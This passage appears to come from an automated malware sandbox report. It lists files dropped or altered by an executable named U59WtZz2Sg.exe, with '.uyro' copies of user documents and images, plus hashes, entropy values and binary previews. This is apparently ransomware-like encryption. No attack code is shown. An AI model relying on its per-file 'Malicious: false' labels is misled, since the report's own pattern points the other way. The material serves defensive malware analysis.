Preview:	SQRKH.D....n....Cc.$..5...\<lq..[h.V....v...Y3.#.H.[}..if%..O.i8.'.....9!..m0./...b.#<.... ........M\|h.^.sNy..1.....c}...O.U-..u..$..T...A .yE.7.#..t.......O..<..c.:.y\..)Y.O5.eIS=M..S1f ...,@..=...U.6.{1. oQG..hU>G.;....e....l.....Hw...#..e0..(.......v.2..2.}h_.[......-......j.2R..#.q......aVJ_.Ul...d..'\|....&.cE..~A.nt.....<....J+.F...?...n[..R......Nsz..Z....F.z.8...x.D..@....w:.. .T....XX..........b....h..#g......2./.DHx.c.5]Y...._'T..U.....\|0.I.T...ug59..[.A.....'&...7I.h......m@............BG..9...,3..Y.f/..qyk..<.Z..c..w..w.....@.)..a..j...d....EA.....w..y.Ym,.....3w...\'...1.m.p...%?.q..6..QA.\>.6.g.&:..r.....i..r..PYU.DX..s.-..pM%{a.7XD..$.}...FL.j..$..Vg).y.K..CB...iRH.:...]..>.B...Q..tx...EV.......u.......+.oX..>.H........9.)q.$...2.~]%f.Q....C..I...A..K.K......R...BK&U.Yl..\.H....G...w6zj6A.?.5.3;PV. ..$.a.-....l....KwM.......C.f...@.}f.v4".....].O.)N>...8?.2VI.N....q&.......1....6...........!.......;'.'.....c...bX..j..Wd._..

C:\Users\user\Desktop\YPSIACHYXW\SQRKHNBNYN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8490423253196555
Encrypted:	false
SSDEEP:	24:dW+6qWR4XrCP0kPwAdyYyyFKqDqdX+eV1ozJTD3YqT+odbuuliHGJRW8GAbD:oTRarf4dyYbFVqB2z57ZT+oVuuIGSaD
MD5:	318E3D29DB85F0F6004D2D78CCA1FB43
SHA1:	6117B2DC247E60780EDD68BB4CE2E04C6A2B1665
SHA-256:	920E8A5A11818A382BE297B7135CA68D9E392D26F0666E3F2C5EBFAE28ACEC7C
SHA-512:	E81F957B7F11AB29436FDCE1347722C214DBC38021C6068F55BA12B53720998DA2B6FDD909F3781A90F1D7A049FDA6667C2493D129F1C9B7A0F84DDF772B20D0
Malicious:	false
Reputation:	unknown
Preview:	SQRKH.D....n....Cc.$..5...\<lq..[h.V....v...Y3.#.H.[}..if%..O.i8.'.....9!..m0./...b.#<.... ........M\|h.^.sNy..1.....c}...O.U-..u..$..T...A .yE.7.#..t.......O..<..c.:.y\..)Y.O5.eIS=M..S1f ...,@..=...U.6.{1. oQG..hU>G.;....e....l.....Hw...#..e0..(.......v.2..2.}h_.[......-......j.2R..#.q......aVJ_.Ul...d..'\|....&.cE..~A.nt.....<....J+.F...?...n[..R......Nsz..Z....F.z.8...x.D..@....w:.. .T....XX..........b....h..#g......2./.DHx.c.5]Y...._'T..U.....\|0.I.T...ug59..[.A.....'&...7I.h......m@............BG..9...,3..Y.f/..qyk..<.Z..c..w..w.....@.)..a..j...d....EA.....w..y.Ym,.....3w...\'...1.m.p...%?.q..6..QA.\>.6.g.&:..r.....i..r..PYU.DX..s.-..pM%{a.7XD..$.}...FL.j..$..Vg).y.K..CB...iRH.:...]..>.B...Q..tx...EV.......u.......+.oX..>.H........9.)q.$...2.~]%f.Q....C..I...A..K.K......R...BK&U.Yl..\.H....G...w6zj6A.?.5.3;PV. ..$.a.-....l....KwM.......C.f...@.}f.v4".....].O.)N>...8?.2VI.N....q&.......1....6...........!.......;'.'.....c...bX..j..Wd._..

C:\Users\user\Desktop\YPSIACHYXW\WKXEWIOTXI.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853591056002287
Encrypted:	false
SSDEEP:	24:C8z4K0anmr5onjlkkndrLNcFMkcLLekrCuu/3bi9W7GQ5SRyVDIQYnyN7eabD:Ci/mtoLndr+ukcHekRYG5RyVkLnG7nD
MD5:	2BDBB530966EB813203257B286A6D82A
SHA1:	39E98D269547A2D91A3F9F4E7FE3B1EE086C0BA0
SHA-256:	86E8E28F95326016C4C9E7E58C83C8C900ABBC35B90F628038132C744FBB49E0
SHA-512:	70C7AB9126721401D8A928BCE173E3FEE54100BBEF9D8F95282D8466AC057646B565FD0149CC2B19A88AD882936360996E6FBA07F2EC35C09F9E03EE79546DE8
Malicious:	false
Reputation:	unknown
Preview:	WKXEW_r9.N...5fZ..u>..{{.........R..u$..v...L.s.d5X.O@.......dySd.w..S..%.....Z..F2..x.......Q....].p...s.y.G..X....\|F.T..k3._....XwF."..yYQ.y.)MM......P...T.w.V...1f...$.OH...+@..H./8..8.Aqt..8G.........@.....)..K.O..vZ...g....S.1M..hb)[.T6Z..v.I...PZ.p2.M...9.N..2..i....}...X...2U.7.Z ..AF"............;..s.....2.r..C..Hn....4sY.Y..W.B.[...Y.....R..L._.N._.."A.A..6s.x....K.~...$.....A.^..}.l....Gv.X...$X...\|.54a.z..:b...I.PzfH.H....../.B....l..\.z.............rl;..(5.y..u.n.`...>4I.k.....DVT........5...r.2.M.....3..>.U.j...O..^m=.H.............!......h...!..)........C..u [`...kEy.'5.Z.\..X.q.,.w....M..u..\..k..a&{N...s.s...FX.B7.....1.w.@.Q..(..m.....]...K...VKz..$...S.yq....1X.F...c...D.O..J.w8...pW...Y..(......3u..SU..\|....>..Q...O.O...(....#....)..4z...%..J..V:.$.#.Wu.x.#x._..\.).(...&..+V.&..m{#9..>.9,...\.+wy../L..:....<.w..?..v.gsY....,.......~..ge!.h..y.(.u.rh$<u...EL.....-b.{...e.kt:.?b%%C....g5..g...E0.....va..

C:\Users\user\Desktop\YPSIACHYXW\WKXEWIOTXI.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853591056002287
Encrypted:	false
SSDEEP:	24:C8z4K0anmr5onjlkkndrLNcFMkcLLekrCuu/3bi9W7GQ5SRyVDIQYnyN7eabD:Ci/mtoLndr+ukcHekRYG5RyVkLnG7nD
MD5:	2BDBB530966EB813203257B286A6D82A
SHA1:	39E98D269547A2D91A3F9F4E7FE3B1EE086C0BA0
SHA-256:	86E8E28F95326016C4C9E7E58C83C8C900ABBC35B90F628038132C744FBB49E0
SHA-512:	70C7AB9126721401D8A928BCE173E3FEE54100BBEF9D8F95282D8466AC057646B565FD0149CC2B19A88AD882936360996E6FBA07F2EC35C09F9E03EE79546DE8
Malicious:	false
Reputation:	unknown
Preview:	WKXEW_r9.N...5fZ..u>..{{.........R..u$..v...L.s.d5X.O@.......dySd.w..S..%.....Z..F2..x.......Q....].p...s.y.G..X....\|F.T..k3._....XwF."..yYQ.y.)MM......P...T.w.V...1f...$.OH...+@..H./8..8.Aqt..8G.........@.....)..K.O..vZ...g....S.1M..hb)[.T6Z..v.I...PZ.p2.M...9.N..2..i....}...X...2U.7.Z ..AF"............;..s.....2.r..C..Hn....4sY.Y..W.B.[...Y.....R..L._.N._.."A.A..6s.x....K.~...$.....A.^..}.l....Gv.X...$X...\|.54a.z..:b...I.PzfH.H....../.B....l..\.z.............rl;..(5.y..u.n.`...>4I.k.....DVT........5...r.2.M.....3..>.U.j...O..^m=.H.............!......h...!..)........C..u [`...kEy.'5.Z.\..X.q.,.w....M..u..\..k..a&{N...s.s...FX.B7.....1.w.@.Q..(..m.....]...K...VKz..$...S.yq....1X.F...c...D.O..J.w8...pW...Y..(......3u..SU..\|....>..Q...O.O...(....#....)..4z...%..J..V:.$.#.Wu.x.#x._..\.).(...&..+V.&..m{#9..>.9,...\.+wy../L..:....<.w..?..v.gsY....,.......~..ge!.h..y.(.u.rh$<u...EL.....-b.{...e.kt:.?b%%C....g5..g...E0.....va..

C:\Users\user\Desktop\YPSIACHYXW\YPSIACHYXW.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858950676602532
Encrypted:	false
SSDEEP:	24:VMZico96FDjK7UOX36owJSw50aH8x6CzYLgZchGENHWNs00OghAkM0QYIyGu/bD:KIZ9IdOXKJSwiaHkYLgytuFgh5M0DDjD
MD5:	FA97CA739EFDC58F12B432534E522723
SHA1:	1D4740E5AC7DF5097C825D0B595F62CCD6AD4489
SHA-256:	60B30BD6201B9AD500E14F97E935D53AB2C4592A3F35F028C878DED5BAD6445E
SHA-512:	652BBD5BD14E0FA8161E2431C58CBE823A2DB5940DFC4B70B111EC65BD25E3E5C822EEA840916E1EE0E9AA833A0ACFBD42B218801F79D79AD428C29E1017DA47
Malicious:	false
Reputation:	unknown
Preview:	YPSIA.x.....[\V.(,.\B..sf...M.t<......H\|..&.L.$T.!e.}H..La,..m~...MQ.2B.@..4Sp....._..."'.pP......#^>.~.Q. ...SY..g...OJ...(.r..h..8....+_..B%......q....n..m>..R.t...X?!.,'A.....I.R.e..f..M.q{.#m/.N...Y.#b..z....H.B.w.A....U.>..I..<..U..$U..c.2....g78.%d[...........E?...3...EV...l......o.of...".(....D...Y;9...c.)...mV..Nt....vN...R....\KT..X...X..P.UZ......T.?h.XRQ...j]....\|..e...>.u.75.H...7.....g5G..\|."..&...u.,..l.T._11.....=...b....<.L..no..1....g.:&..Cq./.X.A].F.........L7'X..Vz..5...0."QCX9.....P&Y.j.1c3S.6.u.2A..c.KV.m..B.x.....T-d.F...q.b.....r...U.6.41.9...5i..8<U.....B....C.v%.RF..P..p..t%...b...5..n.....e`0H3.I...l$J.7LA../..zf....W.s....~.)m.)%.}......\|@\|:.\|%.qo..2.R.q.-/.Z.....U.W}Sl.i......9..o..hQP.!..BYW.....#..y.:...Q..u..r....oMgs.-..!......:..H\.{.Pv..x..;./8H.q?......<....E......N.e.B...P..=*...u#..3.9I....5..B!o.T.._.<.S....t.@..f{...JN..(..J.......]hSi.....6m....u...>.N.[...[\|.f.e(....6.@.n2\|....'....2~a....q.%..k.KCN.WV

C:\Users\user\Desktop\YPSIACHYXW\YPSIACHYXW.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858950676602532
Encrypted:	false
SSDEEP:	24:VMZico96FDjK7UOX36owJSw50aH8x6CzYLgZchGENHWNs00OghAkM0QYIyGu/bD:KIZ9IdOXKJSwiaHkYLgytuFgh5M0DDjD
MD5:	FA97CA739EFDC58F12B432534E522723
SHA1:	1D4740E5AC7DF5097C825D0B595F62CCD6AD4489
SHA-256:	60B30BD6201B9AD500E14F97E935D53AB2C4592A3F35F028C878DED5BAD6445E
SHA-512:	652BBD5BD14E0FA8161E2431C58CBE823A2DB5940DFC4B70B111EC65BD25E3E5C822EEA840916E1EE0E9AA833A0ACFBD42B218801F79D79AD428C29E1017DA47
Malicious:	false
Reputation:	unknown
Preview:	YPSIA.x.....[\V.(,.\B..sf...M.t<......H\|..&.L.$T.!e.}H..La,..m~...MQ.2B.@..4Sp....._..."'.pP......#^>.~.Q. ...SY..g...OJ...(.r..h..8....+_..B%......q....n..m>..R.t...X?!.,'A.....I.R.e..f..M.q{.#m/.N...Y.#b..z....H.B.w.A....U.>..I..<..U..$U..c.2....g78.%d[...........E?...3...EV...l......o.of...".(....D...Y;9...c.)...mV..Nt....vN...R....\KT..X...X..P.UZ......T.?h.XRQ...j]....\|..e...>.u.75.H...7.....g5G..\|."..&...u.,..l.T._11.....=...b....<.L..no..1....g.:&..Cq./.X.A].F.........L7'X..Vz..5...0."QCX9.....P&Y.j.1c3S.6.u.2A..c.KV.m..B.x.....T-d.F...q.b.....r...U.6.41.9...5i..8<U.....B....C.v%.RF..P..p..t%...b...5..n.....e`0H3.I...l$J.7LA../..zf....W.s....~.)m.)%.}......\|@\|:.\|%.qo..2.R.q.-/.Z.....U.W}Sl.i......9..o..hQP.!..BYW.....#..y.:...Q..u..r....oMgs.-..!......:..H\.{.Pv..x..;./8H.q?......<....E......N.e.B...P..=*...u#..3.9I....5..B!o.T.._.<.S....t.@..f{...JN..(..J.......]hSi.....6m....u...>.N.[...[\|.f.e(....6.@.n2\|....'....2~a....q.%..k.KCN.WV

C:\Users\user\Desktop\YPSIACHYXW\ZBEDCJPBEY.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863733526784965
Encrypted:	false
SSDEEP:	24:wY0LrgXPVKbdfKPZuFcnP/762lvJDnexEiQKXC6GToyv+fL8nKziRvqxMNobD:wYN/VKdUUWP/7vBCQKSpn4bWRyxMED
MD5:	892354A5F41A6D8415DD8C7FA9B6A8C2
SHA1:	454A8873357C94C7BC91BC0021FAF184A95563F9
SHA-256:	D1333577338B370688C4B2DE0D0C05339D34F5124A9C1576F72C9FB2FB3286CB
SHA-512:	5B6605D51985C71F43AB22CB3BBD18D61D5369CBB242FB4A9DBF4361D1AC9B649D6782C43E2D391451237441D2F25E48EFB8251A0B0C646171560FEF814943FB
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC,bL.:y\|.s.S<....'h.\|.g{..il......Pk...e"i.5.....[....3(.g...:h..L.../.rF0.%.m...6....].0...D..ky.jX.).fp..U@.G$.+...kE.@l..E.5K.v\~....2.>.i..y....q...1N...\.ro.....Z..D>.P........?{={.Q...<........2.e...9^R'.[.G\|.L.."#+<...B....8.n....S....g.s......a..J .'...s.z;..c..n.$3F.'hS`Pe...a..C..W./sk...=0....Hp..&A.g.n.Q.plQn7./.j.9...........z.os2<.K....P...Z..R.@H..n.R..U.k..N@.2S.......@^R8..Tc......}q..!...Y.g.Mwn...r.\|..ES...lVK.&...t.tkzt23>.V5...yUl[.$.35<<....).&.dPr..].c....a.........WK^&..?.%.....,/7.+rh......`+z....F..:I#....D0.1........P...b...#...G-u._.a_...7...._.%..\|.....[.{.g.x..I.:.8..,.X3.b..W...n._.nQ .(On.f...e......~9..^8._.`c.<):.JE.s...1o2....\:.J2.\8.D.....wc.2\|~"...R.)`.vm.;.....J..\.Z......R.k.js...j.F.8....N....M..}Q1V......;ojXA@.TW..j..<...Z\;H.....tZ.o.x.CU5{.u.&Xb~z...6d..w...3..Q.]...A......Yr7...5...i...., ......y;..O\|R[S..u.o......m.I...aN...1@{.K.z.U.8.S+V.....0.Z.B.Z.....IC.....X..a........

C:\Users\user\Desktop\YPSIACHYXW\ZBEDCJPBEY.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863733526784965
Encrypted:	false
SSDEEP:	24:wY0LrgXPVKbdfKPZuFcnP/762lvJDnexEiQKXC6GToyv+fL8nKziRvqxMNobD:wYN/VKdUUWP/7vBCQKSpn4bWRyxMED
MD5:	892354A5F41A6D8415DD8C7FA9B6A8C2
SHA1:	454A8873357C94C7BC91BC0021FAF184A95563F9
SHA-256:	D1333577338B370688C4B2DE0D0C05339D34F5124A9C1576F72C9FB2FB3286CB
SHA-512:	5B6605D51985C71F43AB22CB3BBD18D61D5369CBB242FB4A9DBF4361D1AC9B649D6782C43E2D391451237441D2F25E48EFB8251A0B0C646171560FEF814943FB
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC,bL.:y\|.s.S<....'h.\|.g{..il......Pk...e"i.5.....[....3(.g...:h..L.../.rF0.%.m...6....].0...D..ky.jX.).fp..U@.G$.+...kE.@l..E.5K.v\~....2.>.i..y....q...1N...\.ro.....Z..D>.P........?{={.Q...<........2.e...9^R'.[.G\|.L.."#+<...B....8.n....S....g.s......a..J .'...s.z;..c..n.$3F.'hS`Pe...a..C..W./sk...=0....Hp..&A.g.n.Q.plQn7./.j.9...........z.os2<.K....P...Z..R.@H..n.R..U.k..N@.2S.......@^R8..Tc......}q..!...Y.g.Mwn...r.\|..ES...lVK.&...t.tkzt23>.V5...yUl[.$.35<<....).&.dPr..].c....a.........WK^&..?.%.....,/7.+rh......`+z....F..:I#....D0.1........P...b...#...G-u._.a_...7...._.%..\|.....[.{.g.x..I.:.8..,.X3.b..W...n._.nQ .(On.f...e......~9..^8._.`c.<):.JE.s...1o2....\:.J2.\8.D.....wc.2\|~"...R.)`.vm.;.....J..\.Z......R.k.js...j.F.8....N....M..}Q1V......;ojXA@.TW..j..<...Z\;H.....tZ.o.x.CU5{.u.&Xb~z...6d..w...3..Q.]...A......Yr7...5...i...., ......y;..O\|R[S..u.o......m.I...aN...1@{.K.z.U.8.S+V.....0.Z.B.Z.....IC.....X..a........

C:\Users\user\Desktop\ZBEDCJPBEY.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862502891079536
Encrypted:	false
SSDEEP:	24:g+LdIXVb2H0Up2OYiWFNii0aH/3OhqXvZ0g6ctZ/lo/1lJ01EH6bD:gKdIlb2H0Up20af+hqXRnRM1U1EH4D
MD5:	DD03A50C559D53EF1F2D2BB1B92B58F7
SHA1:	49763B252D8753F83FC2FF0EF02BB7BD964AEB17
SHA-256:	88CD29CA27FA14ABA6629C7B107CB94593FC6A85C7DD5D5C2BF70D0087D6D724
SHA-512:	21FDD27FAA010289218B756063109CF63E54D70660D9E2AEA59CA88F79688E5C209B83B4411E9CDB1E935E5C2B5D99BF2A4F419891541D31CB546920A937D140
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC-c`.s<.K%.\|......:.Z...f..V>.a...re...1R...Kz.W...,.f....1....C..x....0.J.<.._...#:..z......v&......Y.].o..BI!.....P.]Z.....~.M..pD&].\|..:.nE.mM.I.lk..c..yc.~`..~...#..d^&.(f..s..B..b.rWN./..F..8qgm..<D..:.T....}...z..G$J)-&.3..,..n.....)b..f.x.8u..+.y.2.N..n.FuJ..b.bB...U3g.D..( wUR._...5....t.....,.4.yoL.......Ky`....qv.i./.j......+..v..C.\|..m...b...........9....U'...e......^.r8.8.YCb.....X...G.f?....h...;y~..~.#=PWD.x.FF.D..ok...U.mi.p..PI..(R...a...j..F.../.t.f.....8....G.../..I...]...]...]..8f....?.2^"M...Q.=af..$.o[rmn.@..y6.D.GC.k~.bC.+.r.......0...-...2/...].=\..ch.....sEZt..l........o........TQ.9..Nkt~......i...q.l.V...b'g..,..k..p... ....(`\|.Q...B.m...DW.b..w...gW...z,.Kv..T.0Ej....V8.).#....a[x........<.j...-......mN... ...H.>.T.V.../7)M..R.p^,D.c'.6...........yr.7...\|..).\...z.g.7....=D+.L.....'.Iq^.......)....!.A.?......5...05G...GW....k/F.*.......=f.s.;........4.....S..D\\|...-....h...VE/".6^......O...c.S7R...

C:\Users\user\Desktop\ZBEDCJPBEY.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862502891079536
Encrypted:	false
SSDEEP:	24:g+LdIXVb2H0Up2OYiWFNii0aH/3OhqXvZ0g6ctZ/lo/1lJ01EH6bD:gKdIlb2H0Up20af+hqXRnRM1U1EH4D
MD5:	DD03A50C559D53EF1F2D2BB1B92B58F7
SHA1:	49763B252D8753F83FC2FF0EF02BB7BD964AEB17
SHA-256:	88CD29CA27FA14ABA6629C7B107CB94593FC6A85C7DD5D5C2BF70D0087D6D724
SHA-512:	21FDD27FAA010289218B756063109CF63E54D70660D9E2AEA59CA88F79688E5C209B83B4411E9CDB1E935E5C2B5D99BF2A4F419891541D31CB546920A937D140
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC-c`.s<.K%.\|......:.Z...f..V>.a...re...1R...Kz.W...,.f....1....C..x....0.J.<.._...#:..z......v&......Y.].o..BI!.....P.]Z.....~.M..pD&].\|..:.nE.mM.I.lk..c..yc.~`..~...#..d^&.(f..s..B..b.rWN./..F..8qgm..<D..:.T....}...z..G$J)-&.3..,..n.....)b..f.x.8u..+.y.2.N..n.FuJ..b.bB...U3g.D..( wUR._...5....t.....,.4.yoL.......Ky`....qv.i./.j......+..v..C.\|..m...b...........9....U'...e......^.r8.8.YCb.....X...G.f?....h...;y~..~.#=PWD.x.FF.D..ok...U.mi.p..PI..(R...a...j..F.../.t.f.....8....G.../..I...]...]...]..8f....?.2^"M...Q.=af..$.o[rmn.@..y6.D.GC.k~.bC.+.r.......0...-...2/...].=\..ch.....sEZt..l........o........TQ.9..Nkt~......i...q.l.V...b'g..,..k..p... ....(`\|.Q...B.m...DW.b..w...gW...z,.Kv..T.0Ej....V8.).#....a[x........<.j...-......mN... ...H.>.T.V.../7)M..R.p^,D.c'.6...........yr.7...\|..).\...z.g.7....=D+.L.....'.Iq^.......)....!.A.?......5...05G...GW....k/F.*.......=f.s.;........4.....S..D\\|...-....h...VE/".6^......O...c.S7R...

C:\Users\user\Desktop\ZBEDCJPBEY.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.835490368338712
Encrypted:	false
SSDEEP:	24:WBNKO5eVf3RAyKjgcd8WfdoVrUE+OxiFH+gwNWsvGyac2A9hbD:W/K33ewsWV3+2iFH+FIyapA9xD
MD5:	ACF71D4FE3D5052E8374BED00496F4EC
SHA1:	D29FB1C8A9DEE347D948DC6F7ECBBFCB91927B28
SHA-256:	F829964664E834B68DF3924B9613B4774124F7DE85AE05C3C11EC2D69738CD2C
SHA-512:	68B46D6D7580A145D4B0E78DF203B5CEFED3B1600A24734D10939D4486DF913FE039EA65E04EC38E56361DC035CC18C5EF5C62B600D2368C19EEDA3E89027D18
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC...O.u.u.(J.#.cM..Y0.{5...QBiHS..wi.PR.B...j:A.#._US.8..".....((..o.aR..:..........O_G.....K..!_.......f...n<.4D.....7.T.`T...t..rT.?..Cn.&...\9...N..9X..7.GqhB.{M...<..e......L%Xi..(\|...C..T...JtoB...I..X.{.Ch.a......t...Q.R..z`6D.<a........v..wl...\.;........2Pv.8>.&..n-.........0B..\|,..'..G.U`W.w.q>b..'L.[)....I..]..s.Y....^..?....uvtf\.+..m...l0..8....Q#...n.?. .U....FE.>........-...J:[0%...]..../.KuX_...U.Kk@.ncc..ZTc/.1..3a.z. -.C....}........W....jo..D........S.........Pj..Y.."..&....m..i.rdW.\.Wt......e..G....T..x.-...F...qe.t...#.EN.h.7Sj>9....".W..JGd..@t.......qgO.PXgm.W.........u.....;N`.w..'.G.......z..lgB4../.U....k...T.X.I.06.0. ...b.}..$...... .!..v8{.Z]...WAl...F...c.l.....P.cX.b.7...j..w:.nX.z...u..=s...T.b.DQ.... .d0Zw72.....hbV...MN<m.X{4.....3..7..Cc...w~...)cV..`d<d\p(. .1.(.b.U.&..T...U.R4.V{*g.r................A.../ #E.CE...c.....<R=G._...O\|..u..)S.I.1^J......\..4..e8.p.Z.. .(nV:$...x.Mi#A..[x.".......q.<

C:\Users\user\Desktop\ZBEDCJPBEY.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.835490368338712
Encrypted:	false
SSDEEP:	24:WBNKO5eVf3RAyKjgcd8WfdoVrUE+OxiFH+gwNWsvGyac2A9hbD:W/K33ewsWV3+2iFH+FIyapA9xD
MD5:	ACF71D4FE3D5052E8374BED00496F4EC
SHA1:	D29FB1C8A9DEE347D948DC6F7ECBBFCB91927B28
SHA-256:	F829964664E834B68DF3924B9613B4774124F7DE85AE05C3C11EC2D69738CD2C
SHA-512:	68B46D6D7580A145D4B0E78DF203B5CEFED3B1600A24734D10939D4486DF913FE039EA65E04EC38E56361DC035CC18C5EF5C62B600D2368C19EEDA3E89027D18
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC...O.u.u.(J.#.cM..Y0.{5...QBiHS..wi.PR.B...j:A.#._US.8..".....((..o.aR..:..........O_G.....K..!_.......f...n<.4D.....7.T.`T...t..rT.?..Cn.&...\9...N..9X..7.GqhB.{M...<..e......L%Xi..(\|...C..T...JtoB...I..X.{.Ch.a......t...Q.R..z`6D.<a........v..wl...\.;........2Pv.8>.&..n-.........0B..\|,..'..G.U`W.w.q>b..'L.[)....I..]..s.Y....^..?....uvtf\.+..m...l0..8....Q#...n.?. .U....FE.>........-...J:[0%...]..../.KuX_...U.Kk@.ncc..ZTc/.1..3a.z. -.C....}........W....jo..D........S.........Pj..Y.."..&....m..i.rdW.\.Wt......e..G....T..x.-...F...qe.t...#.EN.h.7Sj>9....".W..JGd..@t.......qgO.PXgm.W.........u.....;N`.w..'.G.......z..lgB4../.U....k...T.X.I.06.0. ...b.}..$...... .!..v8{.Z]...WAl...F...c.l.....P.cX.b.7...j..w:.nX.z...u..=s...T.b.DQ.... .d0Zw72.....hbV...MN<m.X{4.....3..7..Cc...w~...)cV..`d<d\p(. .1.(.b.U.&..T...U.R4.V{*g.r................A.../ #E.CE...c.....<R=G._...O\|..u..)S.I.1^J......\..4..e8.p.Z.. .(nV:$...x.Mi#A..[x.".......q.<

C:\Users\user\Documents\BPMLNOBVSB.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862632701079009
Encrypted:	false
SSDEEP:	24:mYjatRKlyJBzw17M0UrPjvyvy3DOYiNiSF2KUWy9TzZAgPHp9x0CRPAlfJibD:mY45WgpPzNisSF2lWywgPjMwD
MD5:	673AFC8F192F58C5275AC2485E04EC82
SHA1:	BD709B7EE8C43834E53AB7B1E92D04BDFBFDCA5A
SHA-256:	7F883D1AA0BAFA655A71D42FA1AC3FEEE1B9168AE1C486DA78505017B6255A48
SHA-512:	F3214A7CD39DDC881C1299B2A8182C2DE985010BD377842891621C93450BF0615AEB5CBC032D79F891254312D4BC7454E62E9C4931C7FB3F5A607AE2691C73AD
Malicious:	false
Reputation:	unknown
Preview:	BPMLN`.~F1P.[...W.X~..R\|.j,Z..&..u.....@9....l...~q.{{.l@........l....>.z..q".Q....z...=J./".l...?.5 .s.}eh......p..7].=........'....%.{&e.%p?'jL...2.#t..A...r.,..1\..Xi....0.'br\|.X....1.yg.7..........^....<....L%......M>...S.....s.E.N..9.....).s....\|5..c..t.{....},....z.T...w.\|....+Ek<[q.........+.6.#...M.\...M"..9...g..?..-.gW`...........%m......@.l.....6.A/.X./.&_....Jk....:..^..n.g...N..@$.~..9....K......E.)..d..n........\.....!Zi.\|.{{..N..m...D.5.`..x..ULpzB.7g.I.i0H,.T.f,...xi=.{...=..A.=...s.....8%(.....+.....O..$Q.....Kw.E&.P.1]..3J....(....3....$A.$z.%...-#.J..w).....Ry.F.......h.aoc.M......\|.[f..y...J.E^.Y.i.........._x.g..i..8.9.Qk..:R[..o.8..F...v.....X...:.....j....U..d.....-.3.DbM.x~........&'.-...C.o....eR..%.8R....d?G.f.....~.T*.p.o.9...@....v.$..s....j.Q.LaD......:..?..X}...9.sD..u%...K.~..)o..z..". &.>..V?.....]..&......NI{k.q;. W\|..f..}m...\|.4.".a.8%...F.`.....+.(...Gw...x..[...W.,.N..K..J._.+9.86=.F..O <./9.3o.i....U..>

C:\Users\user\Documents\BPMLNOBVSB.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862632701079009
Encrypted:	false
SSDEEP:	24:mYjatRKlyJBzw17M0UrPjvyvy3DOYiNiSF2KUWy9TzZAgPHp9x0CRPAlfJibD:mY45WgpPzNisSF2lWywgPjMwD
MD5:	673AFC8F192F58C5275AC2485E04EC82
SHA1:	BD709B7EE8C43834E53AB7B1E92D04BDFBFDCA5A
SHA-256:	7F883D1AA0BAFA655A71D42FA1AC3FEEE1B9168AE1C486DA78505017B6255A48
SHA-512:	F3214A7CD39DDC881C1299B2A8182C2DE985010BD377842891621C93450BF0615AEB5CBC032D79F891254312D4BC7454E62E9C4931C7FB3F5A607AE2691C73AD
Malicious:	false
Reputation:	unknown
Preview:	BPMLN`.~F1P.[...W.X~..R\|.j,Z..&..u.....@9....l...~q.{{.l@........l....>.z..q".Q....z...=J./".l...?.5 .s.}eh......p..7].=........'....%.{&e.%p?'jL...2.#t..A...r.,..1\..Xi....0.'br\|.X....1.yg.7..........^....<....L%......M>...S.....s.E.N..9.....).s....\|5..c..t.{....},....z.T...w.\|....+Ek<[q.........+.6.#...M.\...M"..9...g..?..-.gW`...........%m......@.l.....6.A/.X./.&_....Jk....:..^..n.g...N..@$.~..9....K......E.)..d..n........\.....!Zi.\|.{{..N..m...D.5.`..x..ULpzB.7g.I.i0H,.T.f,...xi=.{...=..A.=...s.....8%(.....+.....O..$Q.....Kw.E&.P.1]..3J....(....3....$A.$z.%...-#.J..w).....Ry.F.......h.aoc.M......\|.[f..y...J.E^.Y.i.........._x.g..i..8.9.Qk..:R[..o.8..F...v.....X...:.....j....U..d.....-.3.DbM.x~........&'.-...C.o....eR..%.8R....d?G.f.....~.T*.p.o.9...@....v.$..s....j.Q.LaD......:..?..X}...9.sD..u%...K.~..)o..z..". &.>..V?.....]..&......NI{k.q;. W\|..f..}m...\|.4.".a.8%...F.`.....+.(...Gw...x..[...W.,.N..K..J._.+9.86=.F..O <./9.3o.i....U..>

C:\Users\user\Documents\BPMLNOBVSB.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839111654562191
Encrypted:	false
